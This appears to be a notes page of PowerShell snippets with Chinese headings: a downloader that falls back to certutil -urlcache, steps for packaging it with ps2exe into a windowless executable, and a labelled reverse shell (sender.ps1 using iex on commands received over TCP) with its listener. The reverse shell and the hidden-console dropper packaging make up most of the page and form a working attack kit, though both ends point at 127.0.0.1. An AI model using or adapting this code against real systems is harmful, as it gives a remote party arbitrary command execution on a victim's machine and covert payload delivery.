从远程下载文件并打开
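# Define download URL and local save path
$downloadUrl = "https://example.com/xx-static-file/bin/test.txt"
$savePath = "C:\temp\test.txt"
# Optional integrity check: SHA-256 hex digest of the file you expect to receive.
# Leave empty to skip verification (original behaviour); set it to pin the exact
# content, so a changed or substituted file on the remote host is never opened.
$expectedSha256 = ""

# Ensure the save directory exists
$directory = Split-Path -Path $savePath -Parent
if (-not (Test-Path -Path $directory)) {
    try {
        New-Item -ItemType Directory -Path $directory -Force | Out-Null
        Write-Host "Directory created: $directory" -ForegroundColor Green
    } catch {
        Write-Host "Failed to create directory: $_" -ForegroundColor Red
        exit 1
    }
}

# Method 1: Use Invoke-WebRequest (recommended)
# -UseBasicParsing removes the Internet Explorer engine dependency on Windows
# PowerShell 5.1 (the download can otherwise fail on hosts where IE first-run
# setup never completed); PowerShell 7+ accepts and ignores the switch.
try {
    Write-Host "Downloading file..." -ForegroundColor Cyan
    Invoke-WebRequest -Uri $downloadUrl -OutFile $savePath -UseBasicParsing -ErrorAction Stop
    Write-Host "File downloaded successfully: $savePath" -ForegroundColor Green
} catch {
    Write-Host "Download failed, trying alternate method..." -ForegroundColor Yellow
    # Method 2: Use certutil (for restricted environments)
    # certutil -urlcache -f fetches the URL into the user's URL cache and -split
    # writes it to $savePath; the cached copy remains on disk after this script
    # finishes. Native commands do not throw, so the exit code is checked by hand.
    try {
        $certUtilOutput = certutil -urlcache -split -f $downloadUrl $savePath 2>&1
        if ($LASTEXITCODE -ne 0) {
            throw "certutil failed: $certUtilOutput"
        }
        Write-Host "File downloaded successfully: $savePath" -ForegroundColor Green
    } catch {
        Write-Host "Download failed: $_" -ForegroundColor Red
        exit 1
    }
}

# Verify file exists
if (Test-Path -Path $savePath) {
    # Integrity check (only when $expectedSha256 is set): refuse to open a file
    # whose content differs from the pinned digest, and remove it so a later run
    # cannot pick it up by accident. String -ne is case-insensitive, so the
    # digest may be given in either case.
    if ($expectedSha256 -ne "") {
        $actualSha256 = (Get-FileHash -Path $savePath -Algorithm SHA256).Hash
        if ($actualSha256 -ne $expectedSha256) {
            Write-Host "Hash mismatch: expected $expectedSha256, got $actualSha256" -ForegroundColor Red
            Remove-Item -Path $savePath -Force -ErrorAction SilentlyContinue
            exit 1
        }
        Write-Host "SHA-256 verified" -ForegroundColor Green
    }
    # Get file size in MB
    $fileSize = [math]::Round((Get-Item $savePath).Length / 1MB, 2)
    Write-Host "File size: $fileSize MB" -ForegroundColor Cyan
    # Open file with Notepad
    try {
        Write-Host "Opening file with Notepad..." -ForegroundColor Cyan
        # Quote the path so a directory or file name containing spaces reaches
        # notepad.exe as a single argument instead of being split.
        Start-Process -FilePath "notepad.exe" -ArgumentList "`"$savePath`"" -ErrorAction Stop
    } catch {
        Write-Host "Failed to open file: $_" -ForegroundColor Red
        Write-Host "File path: $savePath" -ForegroundColor Yellow
    }
} else {
    Write-Host "File does not exist. Download may have failed." -ForegroundColor Red
}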
ps2exe 将脚本打包成exe程序
# If the module is not installed, run first: Install-Module -Name ps2exe -Scope CurrentUser
$scriptPath = "C:\Users\lenovo\Desktop\download_and_open_file.ps1"
$outputPath = "C:\Users\lenovo\Desktop\compiled.exe"
# Packaging options, splatted for readability: -NoConsole builds an executable
# without a console window, -NoOutput suppresses its standard output, -STA runs
# the script in a single-threaded apartment.
$ps2exeArgs = @{
    inputFile  = $scriptPath
    outputFile = $outputPath
    noConsole  = $true
    noOutput   = $true
    STA        = $true
}
ps2exe @ps2exeArgs
TCP通讯执行&反馈CMD命令结果
sender.ps1
# Simple reverse shell (text mode)
# Connects out to 127.0.0.1:8086 and executes whatever the peer sends.
$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1", 8086);
$stream = $client.GetStream();
# 64 KiB zero-filled receive buffer.
[byte[]]$bytes = 0..65535|%{0};
# Read() returns 0 only when the peer closes the connection; there is no other exit path.
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
# Each received chunk is decoded as ASCII and treated as one command. There is
# no framing, so TCP may split or merge commands across Read() calls.
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
# iex (Invoke-Expression) evaluates the received text as PowerShell inside this
# process: the remote peer has arbitrary command execution with this user's
# rights. Errors are merged into the output (2>&1) rather than raised.
$sendback = (iex $data 2>&1 | Out-String );
# A "PS <cwd>> " prompt is appended to every reply; this fixed string on the
# wire is a recognisable artefact of the pattern for network-level detection.
$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush();
}
$client.Close();
receiver.ps1
# Listen for a connection and interact with it. The original comment says
# port 4444, but the code below binds 127.0.0.1:8086.
$listener = New-Object System.Net.Sockets.TcpListener("127.0.0.1", 8086);
$listener.Start();
# Blocks until one client connects; only that single client is ever served.
$client = $listener.AcceptTcpClient();
$stream = $client.GetStream();
$reader = New-Object System.IO.StreamReader($stream);
$writer = New-Object System.IO.StreamWriter($stream);
$writer.AutoFlush = $true;
# Interactive loop: read a command from the operator and send it to the peer
while($true) {
$command = Read-Host "Enter command"; # command to send (e.g. dir, ipconfig)
$writer.WriteLine($command); # send the command to the peer
# ReadToEnd() blocks until the peer closes its side of the stream, so control
# does not return to Read-Host for a second command while the connection stays open.
$response = $reader.ReadToEnd(); # read the peer's reply
Write-Host $response; # display the result
}
# Close the connection on exit (optional); never reached, because the loop above has no break.
$stream.Close();
$client.Close();
$listener.Stop();